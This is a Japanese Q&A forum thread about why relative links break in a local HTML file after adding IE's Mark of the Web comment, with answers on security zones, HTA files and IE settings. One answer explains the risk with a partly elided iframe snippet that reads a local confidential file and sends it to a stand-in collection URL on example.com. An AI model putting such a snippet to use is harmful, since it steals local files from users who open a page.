- 締切済み
ローカルHTMLでセキュリティブロック解除
環境 internet explorer8 windows xp sp3 ローカルでHTMLを作成しております。 起動時に毎回セキュリティ保護のため~という警告?がでますので、以下を<HEAD>に入力し出さないようにしました。 <!-- saved from url=(0014)about:internet --> 警告は出なくなったのですが、今度は相対パスで指定したファイルのリンクがつながらなくなりました。 (例) <a href="data/pdf/test.pdf">ここをクリック</a> 対処法などありましたら教えて頂きたく。
- mikanbako00
- お礼率92% (24/26)
- HTML
- 回答数6
- ありがとう数6
- みんなの回答 (6)
- 専門家の回答
みんなの回答
- dscripty
- ベストアンサー率51% (166/325)
あらら、ちょっとはしょりすぎたみたい。 | うーん・・・こちらの意図が伝わってなかったようですね。 | 今回作成したものは、ネットに公開しません。 引用ページをかみくだいて、今回のケースにあてはめて説明するね。 IE(一般的なウェブブラウザもそうだけど)は、セキュリティーゾーンといういくつかの、区域に分けてそれぞれがセキュリティー上支障がないように、ぞれぞれの区域ごとに許可レベルを設定して安心して IE を使えるようにしてあるんだけど、 ローカルゾーンであるはずの PC 上の HTML ファイルを、質問者さんは、みずから、インターネットゾーンに変えてしまっているわけだから、 IE はそのファイルを『ローカル』じゃなくて、『インターネットで信頼できるかわからない』ファイルとして、あつかっているわけ、 説明は不要だとおもうけど、いちおう書いておくね。 もし、『インターネットで信頼できるかわからない』ページに、ローカルファイルへのアクセスを許したらどうなるかというと、 例えば、http://example.com/index.html というファイルがあって、 | <iframe | onload="location.href='http://example.com/collect-data.php?data=' & encodeURI( | this.contentWindow……<省略>);" | src="file:///C:/Documents and Settings/Administrator/デスクトップ/社内秘.txt"></iframe> ↑のように書かれていたとき、↓にアクセスするだけで、 http://example.com/index.html ↓が example.com サーバへおくられちゃうということ。 file:///C:/Documents and Settings/Administrator/デスクトップ/社内秘.txt これで、「<!--saved from url=(0014)about:internet -->」のあきらめついた?
- dscripty
- ベストアンサー率51% (166/325)
インターネット上のウェブページがローカルにあるファイルにアクセスできちゃったら、情報漏洩させられまくりだよ? http://technet.microsoft.com/ja-jp/library/cc782928(v=ws.10).aspx ----引用---- Web ページを常にインターネット ゾーンの一部として処理する場合 は、次の Web のマークを使用するこ とができます。 <!--saved from url=(0014)about:internet --> このコメントを使用するのは、Web のマークを一般的に挿入する場合で す。about:internet の部分は、この ページをインターネット ゾーンに入 れることを示します。 ----引用おわり----
- dscripty
- ベストアンサー率51% (166/325)
そういうことなら、解決策は、下のどちらかかな? 1) script タグを使わない。 2) html 内のスクリプトを完全に信用して .hta(※ HTML Application) を使う。 (※ HTML Application) http://msdn.microsoft.com/ja-jp/library/ms536496%28v=vs.85%29.aspx http://en.wikipedia.org/wiki/HTML_Application
お礼
実はHTAも作成したことがあるんです。 リンクが必ず別ウィンドウで立ち上がる、リンクを開いた時に警告ウィンドウが出るなど色々問題点がありましたが、一応クリアできております。 が、ちょっと上記とは別エラーで使い物にならず(ここでのエラーは割愛させて頂きます、質問の主旨が変わってしまいますので)他の方法を探しておりました。 とりあえず、なぜ質問の方法でリンクが使えないのか等原因を教えて頂けると諦めが付きます。
- dscripty
- ベストアンサー率51% (166/325)
セキュリティーに疎いなら、 [ANo.2] さんの回答のように設定にした PC ではインターネットからウェブページのダウンロード保存はしないようにね! これも、セキュリティーに疎いなら、おすすめできないけど 『PC にウェブサーバをインストールする』 おすすめは、 『誰かにウェブサーバを作ってもらってそれを使わせてもらう』が楽でいいね。
お礼
回答ありがとうございます。 今回はローカルでHTMLを作成・利用するということで、ウェブサーバーの構築または利用しないという条件です。
- mikemike7
- ベストアンサー率87% (97/111)
とりあえず <!-- saved from url=(0014)about:internet --> を消しましょう。 IEのツール→インターネットオプション→詳細設定タブ と移動して、セキュリティの項目にある マイコンピュータのファイルでのアクティブ コンテンツの実行を許可する にチェックを入れれば警告はでなくなるかもしれません。
お礼
すみません。説明不足でした。 IEの設定で警告を出さなく出来るかもしれないというのは知っていましたが、その方法は取りたくなく、今回のような苦肉の策をやりました。 回答ありがとうございます。
補足
他にはHTAに変換という手もあるみたいですが、できればHTMLのまま利用したいと思っております。
- 0909union
- ベストアンサー率39% (325/818)
>saved from url=(0014)about:internet --> ????? 何だこりゃ・・・・・ IEだと(?)思うが、アプリのエンコードなしの保存ファイルと思われる。 >今度は相対パスで指 あたりまですよね。そのアプリ独自のフォーマットで保存されるので。Filesなどのフォルダーに保存されると(他の意味のあるメタデーターを良く見ること)、そのパスが必要です。 一度、IEなどの「名前をつけて保存」で、ソースコードを研究してください(2、3分で分かると思うよ)。
お礼
回答ありがとうございます。 <!-- saved from url=(0014)about:internet --> ↑これはMark of the Webというものです。 参考(MSDN)・・・http://msdn.microsoft.com/en-us/library/ms537628(VS.85).aspx まぁ、これを使うのがベストかの判断は私には出来ませんが、探して見つかった方法がこれでしたので・・・ IEなどの名前をつけて保存?てのはよく分からなかったです。 Webページのソースを見るときはいつも表示→ソースを使っておりますので(こういうことじゃないのかな?)
お礼
うーん・・・こちらの意図が伝わってなかったようですね。 今回作成したものは、ネットに公開しません。 あくまで、ローカルで使用する為に作っております。 そもそも、ネットに公開(サーバーにアップ)した場合、今回のようなセキュリティの保護云々の警告は出ませんので(出にくい?)・・・ (少なくとも今回作っているものは出ません確認済みです) なぜか、IEはローカルのほうがセキュリティ設定が厳しいんですよね。 なんとかならんかなー